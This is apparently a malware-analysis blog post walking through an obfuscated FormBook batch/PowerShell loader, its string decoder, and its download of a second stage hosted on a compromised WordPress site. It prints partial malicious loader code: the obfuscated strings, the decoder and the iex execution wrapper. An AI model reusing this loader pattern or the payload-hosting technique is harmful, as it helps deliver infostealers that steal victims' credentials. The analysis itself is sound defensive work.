FormBook Malware - The Uninvited Guest of WordPress

Introduction

Hey everyone 🙏, today we’ll be exploring FormBook, an infostealer malware 🤖 that has been circulating since 2016, offered on hacking forums as Malware as a Service (MaaS). Recently, I stumbled upon a fresh sample named rCheq0004783.bat on Malware Bazaar, dated May 15, 2024. It’s obfuscated, but after some digging it turns out to be just another FormBook variant, executed only after multiple stages of de-obfuscation.

What’s interesting is how this sample hides one of its payloads on a vulnerable WordPress website. Seems like the malware found a new hideout. Sneaky? 🥸

Keep reading as I dig into the analysis, revealing FormBook’s newest tactics.

[Figure - Malware Bazaar]

Analysis

Download the sample from: Malware Bazaar, VirusTotal

The sample is obfuscated and looks like total gibberish at first glance, except for the first line, which reveals the batch script executing PowerShell in hidden mode. See [Figure - FormBook First Stage].

[Figure - FormBook First Stage: first-stage batch script]

Let’s try to de-obfuscate this mess. I’ll copy and paste the obfuscated script into a new file, adding line breaks to make it look cleaner. I attempted replacing all semicolons with \n characters, but the output wasn’t very clear because some of the obfuscated strings contain semicolons. With no other options left, I went through each line and corrected the syntax; see the code snippet below.

$Konvolutter = 1;                      # substring length: one character per pick
$premonopolises='Su';                  # builds the method name "Substring" piecewise
$premonopolises+='bstrin';
$premonopolises+='g';

# Decoder: returns every third character of $Deferrals, starting at index 2
Function printermanualer($Deferrals){
	$Coadmires=$Deferrals.Length-$Konvolutter;
	For($Imposante124=2;$Imposante124 -lt $Coadmires;$Imposante124+=3){
		$Diskenspringerens+=$Deferrals.$premonopolises.Invoke( $Imposante124, $Konvolutter);
	}
	$Diskenspringerens;
}

# Executes its argument; $Expecter is assigned in the omitted lines (it resolves to iex)
function Investeringsoversigterne($Entr){
	.($Expecter) ($Entr);
}

$Oreopithecus=printermanualer 'OcMEpoClzFei Gl  lReaOm/M,5 ,.La0Ba Bo(AlW RiHinAfd ,oFrwZasAn  eN .TAr P,1Cl0 H.Ev0 O;Bl  NWFoi en A6 B4 H;Wi ,yx M6e,4 u;In grrG,v  :.m1.o2On1Br. .0R,)Nu  ,GFoeFucSuk.eost/ D2Sn0.l1Ek0 z0Bi1 ,0,y1 O  rFEfiDrrSie.efA o UxA,/Sp1S 2.e1Pe.S,0Ou ';
$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';

# ... (OMITTING A FEW LINES)
# ... (OMITTING A FEW LINES)
# ... (OMITTING A FEW LINES)

$Afglatningers=268444;
$neatify=27864;
Investeringsoversigterne (printermanualer '  $ ngM,l SoTabobaL lI :S,SgryGolAdlSyeA,p .sQei Cs,a He= U TeGu,eT t B- .CFiodrn.ct MeSunHetUn C,$PlSFlnh oH,b.abSpeTrr ns,o ');
# ... (OMITTING A FEW LINES)
Investeringsoversigterne (printermanualer 'An$BegHolDioW.b na dl ,:Aaa,alpalSkrA.oQuu unChd,a=mi$U,S .eIbl  v efU,o,nrL a  g,et.eeAfn.lsUn.UnsU,uS.bGas.otsor GiDenmig .(,n$.iAExfS,g,llSta UtBanCuiHynTrgTreShrIns,o,r $ NnDre SaBotPaiBdfB ySi)g. ');
Investeringsoversigterne $allround;

It’s better than before, but still not readable. Let’s decode this step by step. In the above code snippet there are two functions: printermanualer and Investeringsoversigterne. The function printermanualer accepts a string, walks it with Substring(i, 1) starting at index 2 and stepping by 3, and returns the characters it collected; in other words, every third character of the input is real and the other two are junk. Let’s refer to this function as decode_str. I will rename every occurrence of the string printermanualer to decode_str. The other function, Investeringsoversigterne, executes its input string via iex (Invoke-Expression). A safe way to see each stage without running it is to swap that invocation for Write-Output, so the decoded commands are printed instead of executed.

Let’s run the decode_str function in a PowerShell window to decode all the strings present in the sample. See [Figure - decode_str 1].

[Figure - decode_str 1: decode_str function executed]

Using the decode_str function, I can now decode the gibberish strings found throughout the script. See [Figure - decode_str 2].

[Figure - decode_str 2: decode_str example]

Decoding the first variable, $Oreopithecus, revealed a user-agent string. This is a clear indication that the script will perform HTTP communication, most likely to download additional payloads.
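To decode all of the obfuscated literals at once rather than one at a time in a PowerShell window, here is a Python port of decode_str. This is added example code, not part of the original write-up or the sample: decode_str reproduces the printermanualer loop exactly, and decode_all pulls every printermanualer '...' literal out of a script with a regular expression and decodes it. The embedded excerpt is constructed from the four literals in the snippet above; the decoded values in the comments are what this decoder produces for them.

```python
import re


def decode_str(s: str) -> str:
    """Port of printermanualer(): $Konvolutter is 1, so Substring(i, 1) picks one
    character, and the loop walks i = 2, 5, 8, ... while i < len - 1.
    The real text is every third character starting at offset 2."""
    return "".join(s[i] for i in range(2, len(s) - 1, 3))


# Matches printermanualer '<literal>' calls. A PowerShell single-quoted string
# escapes an embedded quote as '', so the class allows that pair.
CALL_RE = re.compile(r"printermanualer\s+'((?:[^']|'')*)'")


def decode_all(script: str) -> list:
    """Decode every printermanualer literal in the script, in source order."""
    return [
        decode_str(m.group(1).replace("''", "'"))
        for m in CALL_RE.finditer(script)
    ]


# Constructed excerpt: the four printermanualer literals copied from the snippet above.
SCRIPT_EXCERPT = r"""
$Oreopithecus=printermanualer 'OcMEpoClzFei Gl  lReaOm/M,5 ,.La0Ba Bo(AlW RiHinAfd ,oFrwZasAn  eN .TAr P,1Cl0 H.Ev0 O;Bl  NWFoi en A6 B4 H;Wi ,yx M6e,4 u;In grrG,v  :.m1.o2On1Br. .0R,)Nu  ,GFoeFucSuk.eost/ D2Sn0.l1Ek0 z0Bi1 ,0,y1 O  rFEfiDrrSie.efA o UxA,/Sp1S 2.e1Pe.S,0Ou ';
$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';
Investeringsoversigterne (printermanualer '  $ ngM,l SoTabobaL lI :S,SgryGolAdlSyeA,p .sQei Cs,a He= U TeGu,eT t B- .CFiodrn.ct MeSunHetUn C,$PlSFlnh oH,b.abSpeTrr ns,o ');
Investeringsoversigterne (printermanualer 'An$BegHolDioW.b na dl ,:Aaa,alpalSkrA.oQuu unChd,a=mi$U,S .eIbl  v efU,o,nrL a  g,et.eeAfn.lsUn.UnsU,uS.bGas.otsor GiDenmig .(,n$.iAExfS,g,llSta UtBanCuiHynTrgTreShrIns,o,r $ NnDre SaBotPaiBdfB ySi)g. ');
"""

# Decoded, in order:
#   Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
#   User-Agent
#   $global:Syllepsis = Get-Content $Snobbers
#   $global:allround=$Selvforagtens.substring($Afglatningers,$neatify)

if __name__ == "__main__":
    for decoded in decode_all(SCRIPT_EXCERPT):
        print(decoded)
```

The last decoded line ties the two integers in the snippet together: $Afglatningers (268444) and $neatify (27864) are the offset and length of a substring carved from a larger blob, and the result ($allround) is what the final Investeringsoversigterne call hands to iex.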

After decoding all the strings in the same manner, I discovered a URL that hosts the second-stage payload for this malware. The URL points to a vulnerable WordPress website. See [Figure - WordPress URL].

[Figure - WordPress URL: vulnerable WordPress site hosting the payload]

Using PowerShell’s System.Net.WebClient, the malware downloads the contents of the WordPress URL. See [Figure - WebClient].

[Figure - WebClient: PowerShell downloading the second stage]

The downloaded file is cleaned in multiple steps, as shown in [Figure - Cleaning Nasard], before execution.

[Figure - Cleaning Nasard: cleaning the downloaded file]

I have created a CyberChef recipe which takes the downloaded file as input and produces the cleaned second-stage payload. See [Figure - CyberChef Recipe].

[Figure - CyberChef Recipe]

Final Note

Alright, folks, there are a lot of FormBook malware analysis reports out there. My aim in this article was to shed light on how threat actors are abusing the never-ending supply of vulnerable WordPress websites.

In this case, the threat actor exploited a vulnerable WordPress plugin that allows arbitrary file upload. Please refer to https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/ for more information. Having uploaded their file, they used the WordPress website as a payload hosting service for the downloader.

This post is licensed under CC BY 4.0 by the author.